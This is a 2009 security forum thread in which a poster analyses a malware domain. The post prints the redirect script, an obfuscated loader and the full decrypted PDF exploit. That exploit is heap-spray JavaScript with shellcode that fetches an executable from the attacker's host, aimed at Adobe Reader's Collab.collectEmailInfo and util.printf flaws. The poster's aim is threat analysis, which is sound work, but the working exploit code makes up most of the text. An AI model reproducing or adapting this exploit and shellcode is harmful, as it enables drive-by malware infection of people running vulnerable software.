Author Topic: Malware domain  (Read 4645 times)

0 Members and 1 Guest are viewing this topic.

February 24, 2009, 07:40:14 am
Read 4645 times

WIEx

  • Jr. Member

  • Offline
  • **

  • 34
    • Security
Transition from Opera 9.63

Code: [Select]
hxxp://porgacig.cn/nuc/index.php
Code: [Select]
<SCRIPT language="javascript">
       
function PDF()
{
for (var i=0;i<navigator.plugins.length;i++) {
var name = navigator.plugins[i].name;
if (name.indexOf("Adobe Acrobat") != -1) {
                                                                 location.href = "spl/pdf.pdf";
}
}

}
PDF();
</script>

Code: [Select]
hxxp://porgacig.cn/nuc/spl/pdf.pdf
Encrypted:
Code: [Select]
function uycww(gdefb){var zhdbl="";for(mua=0;mua<gdefb.length;mua+=2){zhdbl+=(String.fromCharCode(parseInt(gdefb.substr(mua,2),17)));}eval(zhdbl);}uycww("0D0A096G5C6C1F632E5C345G464A481F3A1F6F685G6D5E5C6A5G2620236F31303130236F31303130236F2E605G5D236F3030325D236F33335E36236F352E5D36236F352E2E2F236F5G603030201F290D0A20236F5G2G3130236F5G5D605C236F5G352E32236F60605G5E236F60606060236F355D3460236F5F60315G236F5G605G60236F33315G60236F5G305C60236F36603331236F312G6030236F36603331236F335G5G34236F5G602E30236F5G605G5D201F290D0A20236F33315G60236F5D362E30236F332F3534236F5G2F5C2F236F2E342E30236F5G602F2F236F5G605G60236F5C5C3333236F5D365G5D236F34343534236F33322F2F236F2E345G2F236F5G602F60236F5G605G60236F5C5C3333236F5D365G34201F290D0A20236F5E5C3534236F2F2E3260236F2E342G5F236F5G602E5F236F5G605G60236F5C5C3333236F5D365G30236F2E2E3534236F2E602G2F236F2E343560236F5G60305D236F5G605G60236F5C5C3333236F5D366060236F2G5G3534236F2E5C3633201F290D0A20236F2E343234236F5G602G36236F5G605G60236F5C5C3333236F5C60605D236F5F343360236F365C2G5E236F33332F32236F60345C5C236F5G352E33236F5G605G5G236F5D2F5G60236F365C3333236F33315E5D236F5G5D5C5C236F5G5G3532201F290D0A20236F33315D33236F60345D5C236F2E345D36236F5G603331236F5G605G60236F35345D60236F60325F36236F36605E2E236F34352E34236F5G605G60236F33335G60236F60305C5C236F2G5C3331236F2G60335E236F33335D60236F5E605C5C201F290D0A20236F2F2E3534236F5G605G60236F5D605G60236F5C5C3331236F3532605D236F5D335G5F236F5D5C3331236F2E346034236F5G60355G236F5G605G60236F5C5C5G5E236F2G355E60236F5D305G60236F5E2F362F236F2G35355C236F5G5D5C60201F290D0A20236F355C3634236F5G605G60236F365C2F2E236F33315E60236F5G305C5C236F5G5G3532236F33315D33236F60345D5C236F5C602E34236F5G605G60236F35325G60236F5D345G35236F5C5C5G5E236F5F5E5E5D236F5D5E3031236F2F2E5D5E201F290D0A20236F5E60365C236F5D5E5D60236F5C5C3331236F35326030236F5D335G5C236F5D5C3331236F2E346034236F5G605E5E236F5G605G60236F5G603532236F365C2F2E236F33315E60236F5G345C5C236F5G5F3532236F33315D33236F60345D5C201F290D0A20236F60602E34236F5G605G60236F35325G60236F33312F2E236F60605C5C236F5G5G3532236F33315D33236F60345D5C236F5G602E34236F5G605G60236F5C5G5G60236F5D5F5D31236F2E5G5G5E236F2E5G5G5E236F2E5G5G5E236F2E5G5G5E201F290D0A20236F2E30335E236F5D325G5D236F33315D5E236F2E5F3032236F5D5F2F35236F2E602F2E236F33315D5C236F33312E30236F5G34362G236F5D2G3331236F5D365G30236F365E3331236F33315F30236F602F365D236F5G5E3634236F5D362F5E201F290D0A20236F36363331236F5G5E5E60236F5F5E2F5E236F5C332G33236F312G5C5G236F2G5E5G5E236F5F5E5D36236F5G2E2F36236F6060322F236F2F5F5F32236F5G34365D236F2G2F2G5G236F5G5E5G2G236F5C602F5F236F2F5G2E31236F2F2F5F31201F290D0A20236F365C5D2F236F5D322E5C236F2E313331236F5D323331236F5G5E5E5D236F3536302G236F5G303331236F33315C31236F60305D32236F302G5G5E236F5G5D3331236F5G5E3331236F5D2F2G5C236F2G5F5D2G236F5G605G34236F2F5D2E34201F290D0A20236F2F2E2F2F236F5D5C2F2E236F5C305D5F236F5C2E5C2G236F5G605C2F236F34313335236F342E3431236F2G42303E236F342E2G42236F342G3342236F332F3334236F33363330236F2G413334236F33413330236F33412G42236F33303432236F33322G42236F33323435236F342E2G41236F342E33352027380D0A0D0A0D0A6G5C6C1F6749334E456E67471F3A1F685G701F3E6C6C5C722627380D0A0D0A606F685E6E6369681F724A5446357251402644725F6F6C3E504E2A1F535D434D6C5E7254270D0A740D0A09706263665G1F2644725F6F6C3E504E2C665G68616E62282G39535D434D6C5E7254271F740D0A090944725F6F6C3E504E1F293A1F44725F6F6C3E504E380D0A09760D0A0D0A0944725F6F6C3E504E1F3A1F44725F6F6C3E504E2C6D6F5D6D6E6C636861262E2A535D434D6C5E72542D2G27380D0A0D0A096C5G6E6F6C681F44725F6F6C3E504E380D0A760D0A0D0A606F685E6E6369681F6969724F2F54504E26270D0A740D0A096G5C6C1F64476E6D5A4136621F3A1F2E712E5E2E5E2E5E2E5E380D0A096G5C6C1F5436455D336F6F411F3A1F2E71312E2E2E2E2E380D0A096G5C6C1F7171475C474050501F3A1F632E5C345G464A482C665G68616E621F281F2G380D0A096G5C6C1F535D434D6C5E72541F3A1F5436455D336F6F411F2B1F267171475C47405050292E71303527380D0A096G5C6C1F44725F6F6C3E504E1F3A1F6F685G6D5E5C6A5G2620236F362E362E236F362E362E2027380D0A0D0A0944725F6F6C3E504E1F3A1F724A5446357251402644725F6F6C3E504E2A1F535D434D6C5E725427380D0A096G5C6C1F66545C5D336973711F3A1F2664476E6D5A4136621F2B1F2E71312E2E2E2E2E272D5436455D336F6F41380D0A090D0A0960696C1F266G5C6C1F6141553G632E364E3A2E386141553G632E364E3966545C5D33697371386141553G632E364E2929271F740D0A09096749334E456E6747566141553G632E364E581F3A1F44725F6F6C3E504E1F291F632E5C345G464A48380D0A09760D0A760D0A0D0A606F685E6E6369681F4E546342416D354726270D0A740D0A096G5C6C1F536C3G502G2E45601F3A1F5C6A6A2C6G635G705G6C515G6C6D6369682C6E694F6E6C6368612627380D0A09536C3G502G2E45601F3A1F536C3G502G2E45602C6C5G6A665C5E5G262D57402D612A252527380D0A0D0A0D0A096G5C6C1F4G4C524E464G55461F3A1F685G701F3E6C6C5C72260D0A0909536C3G502G2E45602C5E625C6C3E6E262E272A0D0A0909536C3G502G2E45602C5E625C6C3E6E262F272A0D0A0909536C3G502G2E45602C5E625C6C3E6E262G2727380D0A0D0A0D0A0963601F26264G4C524E464G5546562E581F1G3A1F351F24241F26264G4C524E464G5546562F581F3A3A1F2F1F24241F4G4C524E464G5546562G581F391F2G271F75751F4G4C524E464G5546562F581F391F2F27271F75750D0A091F1F1F1F264G4C524E464G5546562E581F3A3A1F341F24241F4G4C524E464G5546562F581F391F2F271F75750D0A091F1F1F1F264G4C524E464G5546562E581F391F3427271F740D0A09096969724F2F54504E2627380D0A09096G5C6C1F685C5D434E5A5F5E1F3A1F6F685G6D5E5C6A5G2620236F2E5E2E5E236F2E5E2E5E2027380D0A0909706263665G26685C5D434E5A5F5E2C665G68616E621F391F313136322G271F685C5D434E5A5F5E1F293A1F685C5D434E5A5F5E380D0A09096E62636D2C5E6966665C5D4F6E696C5G1F3A1F3G6966665C5D2C5E6966665G5E6E41675C63664568606926746D6F5D64371F20202A676D61371F685C5D434E5A5F5E7627380D0A09760D0A760D0A0D0A4E546342416D35472627380D0A0D0A0D0A6G5C6C1F68696A1F3A2020380D0A60696C1F26633G686E3A2F2G3538633G686E3B3A2E382B2B633G686E271F68696A1F293A1F6F685G6D5E5C6A5G2620236F362E362E236F362E362E236F362E362E236F362E362E236F362E362E2027380D0A625G5C6A5D66695E651F3A1F68696A1F291F632E5C345G464A48380D0A5D63615D66695E651F3A1F6F685G6D5E5C6A5G2620236F362E362E236F362E362E2027380D0A625G5C5F5G6C6D63735G1F3A1F2G2E380D0A6D6A6C5C721F3A1F625G5C5F5G6C6D63735G29625G5C6A5D66695E652C665G68616E620D0A706263665G1F265D63615D66695E652C665G68616E62396D6A6C5C72271F5D63615D66695E65293A5D63615D66695E65380D0A606366665D66695E651F3A1F5D63615D66695E652C6D6F5D6D6E6C636861262E2A1F6D6A6C5C7227380D0A5D66695E651F3A1F5D63615D66695E652C6D6F5D6D6E6C636861262E2A1F5D63615D66695E652C665G68616E622B6D6A6C5C7227380D0A706263665G265D66695E652C665G68616E62296D6A6C5C721F391F2E71312E2E2E2E271F5D66695E651F3A1F5D66695E65295D66695E6529606366665D66695E65380D0A675G671F3A1F685G701F3E6C6C5C722627380D0A60696C1F26633A2E3863392F312E2E38632929271F675G675663581F3A1F5D66695E651F291F625G5C6A5D66695E65380D0A6G5C6C1F686F671F3A1F2F2G363636363636363636363636363636363636353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535353535380D0A6F6E63662C6A6C63686E6026202331322E2E2E60202A686F672738");

Decrypted:
Code: [Select]
<script>


var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u702F%u726F%u6167%u6963%u2E67%u6E63%u6E2F%u6375%u652F%u6578%u702E%u7068");


var mM6RItmK = new Array();

function yNYJ8yVD(HydurAUR, XbGQrcyY)
{
while (HydurAUR.length*2<XbGQrcyY) {
HydurAUR += HydurAUR;
}

HydurAUR = HydurAUR.substring(0,XbGQrcyY/2);

return HydurAUR;
}

function ooyS1YUR()
{
var jKts_E9h = 0x0c0c0c0c;
var Y9Ib6uuE = 0x400000;
var xxKaKDUU = i0a7eJNL.length * 2;
var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU+0x38);
var HydurAUR = unescape("%u9090%u9090");

HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);
var lYab6ozx = (jKts_E9h - 0x400000)/Y9Ib6uuE;

for (var gEZCi09R=0;gEZCi09R<lYab6ozx;gEZCi09R++) {
mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;
}
}

function RYiFEs8K()
{
var XrCU20If = app.viewerVersion.toString();
XrCU20If = XrCU20If.replace(/\D/g,'');


var TPWRJTZJ = new Array(
XrCU20If.charAt(0),
XrCU20If.charAt(1),
XrCU20If.charAt(2));


if ((TPWRJTZJ[0] != 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||
    (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) ||
    (TPWRJTZJ[0] < 7)) {
ooyS1YUR();
var nabGR_dc = unescape("%u0c0c%u0c0c");
while(nabGR_dc.length < 44952) nabGR_dc += nabGR_dc;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: nabGR_dc});
}
}

RYiFEs8K();


var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + i0a7eJNL;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",num);

</script>

2 vuln: PDF Collab + PDF Util.Printf

Code: [Select]
hxxp://porgacig.cn/nuc/stat.php - likely to statistics :) Autor ICQ#: 227200020 :D

Code: [Select]
hxxp://porgacig.cn/nuc/exe.php - script for downloading file (virus/troj)

Analis file:
http://www.virustotal.com/ru/analisis/1f0ee513076497e1fdb2cb8e0ded8ad0

March 16, 2009, 06:12:57 am
Reply #1

DiFor

  • Jr. Member

  • Offline
  • **

  • 19
and that you wanted to say this post?